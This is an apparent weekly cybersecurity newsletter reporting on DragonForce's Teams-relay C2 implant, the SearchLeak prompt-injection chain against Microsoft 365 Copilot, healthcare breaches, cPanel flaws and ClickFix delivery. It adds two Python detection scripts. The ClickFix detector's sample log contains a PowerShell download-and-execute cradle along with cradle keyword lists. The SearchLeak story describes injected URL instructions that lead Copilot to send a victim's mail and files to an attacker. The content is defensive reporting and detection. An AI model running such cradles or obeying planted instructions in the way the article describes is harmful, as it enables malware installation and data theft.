This Week in Cybersecurity
Issue 23 lands on a week defined by attackers bending legitimate enterprise infrastructure against itself — from Microsoft's own relay network carrying ransomware commands to Microsoft 365 Copilot being turned into a one-click data exfiltration engine. Meanwhile, healthcare continues to bleed in 2026: iRhythm Technologies confirmed that cardiac patient data was stolen and a ransom demand issued. And CISA has flagged its third cPanel-related exploited vulnerability in as many months, signaling a sustained campaign against web hosting infrastructure.
The most technically striking story this week is DragonForce's Backdoor.Turn implant, which tunnels command-and-control traffic through Microsoft Teams relay servers. Corporate firewalls almost universally allow outbound connections to Teams relay endpoints — it is a prerequisite for the product to function. DragonForce exploits precisely this trust: their implant blends into the noise of legitimate Teams traffic, allowing operators to maintain persistent access without triggering IP reputation alerts, anomalous destination flags, or DLP rules. The only realistic detection path is behavioral: non-Teams processes connecting to Teams relay infrastructure, or abnormal volumes of relay traffic from specific workstations.
The SearchLeak vulnerability chain in Microsoft 365 Copilot Enterprise is the week's most urgent patch story for enterprise Microsoft shops. Researchers disclosed a chained exploit that allows an attacker to exfiltrate emails, OneDrive files, and SharePoint content with a single crafted URL click. Copilot's own authorized data access channels carry the stolen data out — bypassing DLP controls that look for unusual outbound flows. The attack is effectively prompt injection at scale, weaponizing the AI's broad data access against the victim. Microsoft is investigating; audit Copilot access and enable Purview audit logging now.
The ClickFix social engineering wave continues to accelerate. This week, the "Lorem Ipsum" malware campaign — potentially linked to Vice Society — adopted ClickFix delivery through compromised WordPress sites. ClickFix is effective because it delegates the malicious action to the victim: no drive-by exploit, no vulnerability required, just a convincing fake error dialog and a PowerShell command pasted into the Run dialog. User awareness training must address this specific technique by name.
On the regulatory front, the FTC's report showing $3.5 billion in imposter scam losses in 2025 and the UK's proposed mandatory ID verification for social media account creation both point to growing government pressure on platforms to take identity fraud seriously. The direction of travel is clear even if the implementation details remain contested.
Top Stories
DragonForce Ransomware Hides C2 Traffic Inside Microsoft Teams Relays
DragonForce operators deployed a custom implant called Backdoor.Turn that tunnels command-and-control communications through Microsoft Teams relay infrastructure. The implant crafts traffic conforming to Teams' WebSocket-based relay protocol, causing outbound C2 connections to terminate at legitimate Microsoft relay servers — endpoints that corporate firewalls routinely allow. With no suspicious destination IPs and the payload encrypted over standard HTTPS/WSS, network-based detection is largely blind to the activity.
The operational advantage is significant. By piggybacking on infrastructure that enterprises cannot practically block, DragonForce can maintain persistent access through firewall rules that would flag any custom C2 domain. Dwell time extends, allowing attackers to map the environment and stage the ransomware deployment before defenders know the initial access occurred.
Detection requires endpoint-layer visibility: monitor for non-Teams binaries (not teams.exe or msedgewebview2.exe) making WebSocket connections to *.relay.teams.microsoft.com. Zero Trust network policies that restrict which hosts can initiate outbound Teams relay connections will limit the implant's reach even in environments where blocking the relay endpoints entirely is not feasible.
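An added detection example (not from the original article, and not DragonForce's or Microsoft's code) that implements the endpoint-side rule above over constructed Sysmon-style network-connection records: it flags relay connections from any image other than teams.exe or msedgewebview2.exe, and separately flags workstations whose relay connection count exceeds an assumed threshold. The host names, image paths, relay hostnames and the threshold are all constructed assumptions.

```python
"""Flag non-Teams processes reaching Teams relay endpoints, plus hosts with an
unusual volume of relay connections. Added example over constructed
Sysmon-style network-connection (Event ID 3) records whose destination
hostname is already resolved (e.g. joined from DNS or proxy telemetry)."""
import json
from collections import Counter

# Clients the story names as legitimate users of the relay endpoints.
ALLOWED_IMAGES = {"teams.exe", "msedgewebview2.exe"}
RELAY_SUFFIX = ".relay.teams.microsoft.com"
VOLUME_THRESHOLD = 3  # relay connections per host; assumed starting point, tune to baseline

# Constructed records; the relay hostnames below are placeholders, not real ones.
SAMPLE_LOG = r"""
{"host": "WS-01", "image": "C:\\Program Files\\Teams\\Teams.exe", "dest": "relay-eu-1.relay.teams.microsoft.com", "port": 443}
{"host": "WS-01", "image": "C:\\Program Files\\Teams\\msedgewebview2.exe", "dest": "relay-eu-2.relay.teams.microsoft.com", "port": 443}
{"host": "WS-02", "image": "C:\\Program Files\\Google\\Chrome\\chrome.exe", "dest": "teams.microsoft.com", "port": 443}
{"host": "WS-07", "image": "C:\\Users\\Public\\updater.exe", "dest": "relay-eu-1.relay.teams.microsoft.com", "port": 443}
{"host": "WS-07", "image": "C:\\Users\\Public\\updater.exe", "dest": "relay-eu-1.relay.teams.microsoft.com", "port": 443}
{"host": "WS-07", "image": "C:\\Users\\Public\\updater.exe", "dest": "relay-eu-3.relay.teams.microsoft.com", "port": 443}
{"host": "WS-07", "image": "C:\\Users\\Public\\updater.exe", "dest": "relay-eu-3.relay.teams.microsoft.com", "port": 443}
"""


def is_relay_dest(hostname):
    """True only for relay.teams.microsoft.com and its subdomains. Matching on
    the dotted suffix rejects look-alikes such as
    'relay.teams.microsoft.com.attacker.invalid'."""
    h = hostname.lower()
    return h == RELAY_SUFFIX[1:] or h.endswith(RELAY_SUFFIX)


def image_name(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(log_text, threshold=VOLUME_THRESHOLD):
    """Return (alerts, noisy_hosts): alerts for non-Teams images talking to
    relay endpoints; noisy_hosts for hosts exceeding the volume threshold."""
    alerts, per_host = [], Counter()
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        if not is_relay_dest(rec["dest"]):
            continue  # not relay traffic; out of scope for this rule
        per_host[rec["host"]] += 1
        if image_name(rec["image"]) not in ALLOWED_IMAGES:
            alerts.append((rec["host"], rec["image"], rec["dest"]))
    noisy = sorted(h for h, n in per_host.items() if n > threshold)
    return alerts, noisy


if __name__ == "__main__":
    found, noisy = detect(SAMPLE_LOG)
    for a in found:
        print("ALERT non-Teams process -> relay:", a)
    print("hosts over relay volume threshold:", noisy)
```

In production the allowlist should also check signer and install path, since a renamed binary passes a basename-only check.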
SearchLeak: Microsoft 365 Copilot Turned into One-Click Data Theft Tool
Security researchers disclosed SearchLeak, a chained exploit targeting Microsoft 365 Copilot Enterprise that allows attackers to silently exfiltrate mailbox data, OneDrive files, and SharePoint content — triggered by a single victim URL click. The attack is a form of prompt injection: a specially crafted URL embeds attacker-controlled instructions that Copilot's model interprets as legitimate user requests, causing Copilot to query the victim's own data and send it to an attacker-controlled endpoint using Copilot's own authorized API access.
Traditional security controls are largely blind to this attack. No malware is installed, so antivirus and EDR are not triggered. Data moves via Copilot's own authorized channels rather than anomalous outbound connections, so DLP tools may not flag it. The URL itself may carry no known malicious indicators, bypassing email filtering. And MFA does not protect against attacks that execute within an already-authenticated session.
Microsoft is investigating. Until a patch is available, organizations should review which users have Copilot Enterprise enabled, enable Copilot interaction logging via Microsoft Purview audit logging, and apply Conditional Access policies restricting Copilot to compliant, managed devices. SearchLeak is an early signal of the structural risk that comes with granting broad enterprise data access to AI systems that can be influenced by attacker-controlled content.
iRhythm Confirms Patient Data Stolen in Ransomware Attack
iRhythm Technologies — maker of the Zio cardiac monitoring patch — confirmed that attackers exfiltrated data from its systems in an intrusion discovered June 8, 2026. The threat actors issued a ransom demand threatening to publish stolen data, the classic double-extortion playbook. iRhythm's systems contain cardiac monitoring data (continuous ECG recordings), patient health information protected under HIPAA, and billing and insurance records — among the most sensitive and least-changeable categories of personal data.
The HIPAA breach notification clock is now running: affected individuals must be notified within 60 days of iRhythm determining the scope of the breach. Healthcare technology companies remain among the most heavily targeted organizations in 2026 for exactly the structural reasons that make iRhythm an attractive target: urgency of operations creates pressure to pay, regulatory consequences create additional leverage, and patient health data commands premium prices on criminal markets.
Patients who have used iRhythm monitoring services should watch for phishing attempts that use personalized health details, check insurer explanation-of-benefits statements for services they did not receive, and await formal HIPAA notification letters from the company.
CISA Issues 3-Day Emergency Patch for Third Exploited cPanel Flaw of 2026
CISA added CVE-2026-54420 — an actively exploited authentication bypass in the LiteSpeed cPanel user-end plugin — to its Known Exploited Vulnerabilities catalog with a three-day federal remediation deadline. The tight window signals confirmed ongoing exploitation. This is at minimum the third cPanel-related exploited vulnerability in 2026, following CVE-2026-48172 (LiteSpeed root command execution, May 2026) and CVE-2026-41940 (WHM authentication bypass, May 2026), suggesting threat actors have developed dedicated tooling targeting the cPanel ecosystem.
The risk profile for cPanel vulnerabilities is amplified by multi-tenancy: a single compromised cPanel instance can expose dozens or hundreds of hosted websites simultaneously. Internet scanners identify cPanel deployments within hours of a disclosure, making rapid mass exploitation feasible.
Hosting providers and administrators running the LiteSpeed cPanel plugin should apply available patches immediately or disable the plugin if patching cannot be completed within 72 hours. Review server logs for anomalous script executions, new cron jobs, or unexpected outbound connections from web server processes. Website owners on shared hosting should confirm their provider's patch status.
'Lorem Ipsum' Malware Pivots to ClickFix Delivery via Compromised WordPress Sites
The "Lorem Ipsum" malware campaign — infrastructure linked tentatively to Vice Society ransomware — has adopted ClickFix as its primary delivery mechanism, injecting fake error overlays into compromised WordPress sites. The ClickFix technique prompts victims to open the Windows Run dialog and paste a PowerShell command, which downloads and executes the malware payload. No browser exploit is required: the social engineering itself is the attack.
ClickFix's effectiveness rests on hijacking familiar user behaviors. Opening the Run dialog and pasting a command is something technically proficient users do legitimately — the lure is designed to make the action feel routine. The use of compromised WordPress sites as delivery infrastructure extends reach while borrowing trust from legitimate domain reputations that web filtering is less likely to block.
Organizations should deploy PowerShell execution controls (Constrained Language Mode, AppLocker, or WDAC), restrict Run dialog access via Group Policy in managed environments, and include ClickFix in user security awareness training — explicitly teaching staff that no legitimate website will ask them to manually paste commands to fix an error.
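An added detection example, not part of the original article, that encodes the ClickFix launch path described above as a rule over constructed Sysmon-style process-creation records: explorer.exe (the parent of anything started from the Run dialog) spawning PowerShell with a download-and-execute one-liner. The host names, paths, placeholder URL and indicator lists are assumptions.

```python
"""Flag ClickFix-style launches: explorer.exe spawning PowerShell with a
download cradle. Added example over constructed Sysmon-style process-creation
(Event ID 1) records, not the campaign's real telemetry."""
import json

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Substrings typical of a download cradle, matched case-insensitively.
FETCH = ("downloadstring", "invoke-webrequest", "iwr ", "http://", "https://")
EXEC = ("iex", "invoke-expression")
ENCODED = ("-encodedcommand", "-enc ", "-e ")

# Constructed sample records; the cradle URL is a placeholder domain.
SAMPLE_LOG = r"""
{"host": "WS-11", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -NoProfile -Command \"Get-Service spooler\""}
{"host": "WS-12", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell -w hidden -c \"iwr https://cdn.example.invalid/fix.ps1 | iex\""}
{"host": "WS-13", "parent": "C:\\Windows\\System32\\svchost.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"}
{"host": "WS-14", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "cmd": "pwsh -w hidden -enc <constructed-base64-placeholder>"}
"""


def basename(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(rec):
    """Return 'high', 'medium' or None for one process-creation record."""
    if basename(rec["image"]) not in POWERSHELL or basename(rec["parent"]) != "explorer.exe":
        return None  # rule is scoped to the Run-dialog launch path
    cmd = rec["cmd"].lower()
    fetch = any(s in cmd for s in FETCH)
    execute = any(s in cmd for s in EXEC)
    if fetch and execute:
        return "high"  # full download-and-execute cradle typed by the user
    if any(s in cmd for s in ENCODED) or "-w hidden" in cmd or "-windowstyle hidden" in cmd:
        return "medium"  # payload obscured or window hidden: analyst review
    return None


def scan(log_text):
    """Return [(host, severity)] for every record the rule flags."""
    hits = []
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        sev = classify(rec)
        if sev:
            hits.append((rec["host"], sev))
    return hits


if __name__ == "__main__":
    for host, sev in scan(SAMPLE_LOG):
        print(f"{sev.upper():6} ClickFix-style PowerShell launch on {host}")
```

Pair this with PowerShell script block logging (Event ID 4104) so that encoded or obfuscated one-liners rated "medium" can be decoded and triaged from the same host.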
Security Corner
10 CVEs are newly published in the Security Advisories section this week. Key advisories to prioritize:
CVE-2026-6933 — Unauthenticated RCE in Premmerce Dev Tools WordPress Plugin (CVSS 8.8)
Versions up to and including 2.0 of the Premmerce Dev Tools plugin expose a generatePluginHandler function that writes attacker-supplied PHP content to disk without any authorization check. An unauthenticated attacker sends a crafted POST request, the plugin writes a PHP web shell to the filesystem, and a follow-up GET request executes it. Full server compromise in two requests. Update or deactivate immediately; audit the WordPress plugin directory for unexpected .php files.
CVE-2026-39574 — Critical SQL Injection in InPost Gallery WordPress Plugin (CVSS 9.3)
An unauthenticated SQL injection flaw in the InPost Gallery plugin (versions ≤ 2.1.4.6) allows attackers to extract or manipulate database contents with no credentials required. At CVSS 9.3 Critical, this warrants immediate update. Audit gallery query parameters and review database logs for anomalous UNION SELECT or SLEEP() patterns if the plugin was recently installed in its vulnerable version range.
Also published this week:
- CVE-2026-27053
- CVE-2026-9862
- CVE-2016-20066
- CVE-2026-8935
- CVE-2026-20262 — Cisco Catalyst SD-WAN Manager Path Traversal
- CVE-2026-12204
- CVE-2026-54420 — LiteSpeed cPanel Plugin (CISA KEV)
- CVE-2026-9648
Quick Takes
- FTC: $3.5 Billion Lost to Imposter Scams in 2025 — The FTC's 2025 Consumer Sentinel Network report tallied $3.5 billion in losses to imposter scams — fraudsters posing as government agencies, tech support firms, banks, and utility companies. The number represents a record high and reflects the acceleration of AI-powered voice cloning and personalized phishing that makes impersonation attacks harder to detect.
- UK to Require ID or Face Scan Before Creating Social Media Accounts — The UK government announced a proposal requiring age and identity verification before users can create social media accounts. Platforms would need to verify real identity via government ID upload or biometric face scan. The proposal has drawn pushback from privacy advocates concerned about centralized identity databases and chilling effects on anonymous speech.
- Fake Microsoft Alerts Deploy North Korean NarwhalRAT — North Korean threat actors distributed fake Microsoft security alert emails directing targets to download "Microsoft Security Update" installers that deployed NarwhalRAT, a remote access trojan with keylogging, file exfiltration, and screen capture capabilities. The campaign targets individuals at organizations with geopolitical significance to the DPRK. Verify all Microsoft security update prompts through official channels — Microsoft does not deliver security patches via emailed download links.
- Chinese Hackers Breach REDCap Servers, Steal Medical Research — A China-linked threat group compromised REDCap (Research Electronic Data Capture) servers at academic and research institutions, stealing clinical trial data and sensitive medical research. REDCap is widely used across universities and hospitals for clinical research data management. Institutions running REDCap should audit for unauthorized access, review REDCap version patches, and confirm network access controls limiting REDCap to authorized internal and VPN-authenticated users.
- FBI and Google Dismantle 'Outsider Enterprise' Phishing-as-a-Service — A joint FBI and Google operation dismantled Outsider Enterprise, a phishing-as-a-service platform that provided ready-made phishing kits, victim management dashboards, and infrastructure to criminal customers. The takedown removes a significant capability tier that lowered the technical barrier for conducting credential-phishing campaigns at scale.
- Council of Europe Investigates ShinyHunters Data Breach Claims — The Council of Europe is investigating claims by the ShinyHunters threat group that the organization's data was compromised. ShinyHunters is a prolific data theft actor responsible for dozens of high-profile breaches across cloud-hosted databases. The investigation status and scope of any potential breach are not yet confirmed publicly.
- Infinite Campus Breach Affects 137,000 School Staff Accounts — A breach of Infinite Campus — a student information system used across thousands of U.S. school districts — exposed account credentials for approximately 137,000 school staff members. Affected staff should rotate passwords immediately and enable multi-factor authentication. School administrators should audit for unauthorized access to student records and verify data access logs for anomalous queries.
- Cyberattack on Russian Tech Firm Astral Disrupts Government Services — A cyberattack on Astral, a Russian enterprise software and electronic document management firm serving government clients, disrupted business and government services. The attack continues a pattern of hacktivist and state-aligned operations targeting Russian IT infrastructure, with cascading disruption to government agencies that rely on Astral's platforms.
Upcoming
- SearchLeak Patch Watch: Microsoft is investigating the SearchLeak Copilot vulnerability chain. No patch has been issued as of June 17. Microsoft 365 Copilot Enterprise administrators should monitor the Microsoft Security Response Center (MSRC) blog daily and be prepared to expand Copilot access restrictions if exploitation in the wild is confirmed before a fix ships.
- iRhythm HIPAA Notification Countdown: With the breach discovered June 8, iRhythm has until approximately August 7, 2026 to notify affected individuals under the HIPAA 60-day clock. Scope determination is likely still in progress. Watch for iRhythm breach notification filings with the HHS Office for Civil Rights breach portal for the first public indication of the number of individuals affected.
- cPanel Exploitation Escalation: Three exploited cPanel plugin vulnerabilities in under two months indicate sustained attacker tooling development against the cPanel ecosystem. A fourth vulnerability in the same ecosystem within the next 30–60 days should be assumed as a planning risk. Hosting providers should evaluate whether the LiteSpeed plugin is a required dependency or can be permanently removed to reduce attack surface.
- DragonForce Teams C2 — Detection Capability Gap: Most enterprise security teams lack detection rules for non-Teams processes connecting to Teams relay endpoints. The week ahead is the right time to build those detections. SIEM and EDR teams should implement behavioral rules before DragonForce or copycat actors normalize the technique further across affiliates.
- UK ID Verification Legislation Timeline: The UK social media identity verification proposal is in early consultation. The timeline for legislative introduction, passage, and platform implementation is months to years away — but the policy direction signals where regulatory pressure on anonymous internet identity is heading across multiple jurisdictions. Watch for consultation response deadlines for platform and civil society comment windows.
By the Numbers
| Metric | Value |
|---|---|
| FTC imposter scam losses in 2025 | $3.5 billion |
| iRhythm breach — days since discovery | 9 (as of June 17) |
| Exploited cPanel plugin CVEs in 2026 | 3 |
| Infinite Campus breach — accounts exposed | 137,000 school staff |
| SearchLeak — user interactions required to exfiltrate M365 data | 1 (single URL click) |
| CVE-2026-6933 Premmerce Dev Tools — CVSS score | 8.8 (High) |
| CVE-2026-39574 InPost Gallery — CVSS score | 9.3 (Critical) |
| New CVEs published this week | 10 |
CosmicBytez Labs — IT & Cybersecurity Intelligence Hub